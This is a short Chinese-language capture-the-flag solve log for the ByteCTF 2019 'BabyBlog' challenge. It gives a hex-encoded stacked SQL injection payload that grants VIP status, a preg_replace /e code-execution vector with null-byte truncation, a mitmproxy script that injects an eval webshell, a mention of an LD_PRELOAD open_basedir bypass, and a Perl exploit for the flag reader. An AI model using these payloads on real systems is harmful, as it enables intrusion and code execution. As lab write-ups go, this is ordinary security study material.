刷题记录:[ByteCTF 2019]BabyBlog
题目复现链接:https://buuoj.cn/challenges
参考链接:https://eustiar.com/archives/576
ByteCTF 2019 Writeup - 天枢
知识点
二次注入+堆叠注入
注入点在edit的title
';SeT@a=0x757064617465207573657273207365742069737669703D3120776865726520757365726E616D653D277465737427;prepare execsql from @a;execute execsql;#
把自己的账号改成vip
php 00截断
要求:php版本小于5.3.4
用户输入的url参数包含%00经过浏览器自动转码后截断后面字符
preg_replace/e
参数RCE
$content = addslashes(preg_replace("/" . $_POST['find'] . "/", $_POST['replace'], $row['content']));
从天枢那学了一招用mitmproxy解决蚁剑链接问题
from mitmproxy import http
class add_request:
def request(self, flow) -> None:
flow.request.urlencoded_form['find'] = "/e\x00"
flow.request.urlencoded_form['replace'] = "eval($_POST['a'])"
flow.request.urlencoded_form['id'] = "1"
flow.request.urlencoded_form['regex'] = "1"
flow.request.cookies['PHPSESSID'] = "8192498e1b72a3004a2093fc26f10d28"
addons = [
add_request()
]
然后用error_log的LD_PRELOAD绕过openbase_dir
管道解题读flag
你以为这样就完了吗,可是glzjin不是一般的男人,他把readflag魔改了
CTF 2019 Mywebsql Echohub WriteUp
我手上没ida,就懒得看了,抄个exp
use strict;
use IPC::Open3;
my $pid = open3( \*CHLD_IN, \*CHLD_OUT, \*CHLD_ERR, '/readflag' )
or die "open3() failed $!";
my $r;
$r = <CHLD_OUT>;
print "$r";
$r = <CHLD_OUT>;
print "$r";
$r = eval "$r";
print "$r\n";
print CHLD_IN "$r\n";
$r = <CHLD_OUT>;
print "$r";
$r = <CHLD_OUT>;
print "$r";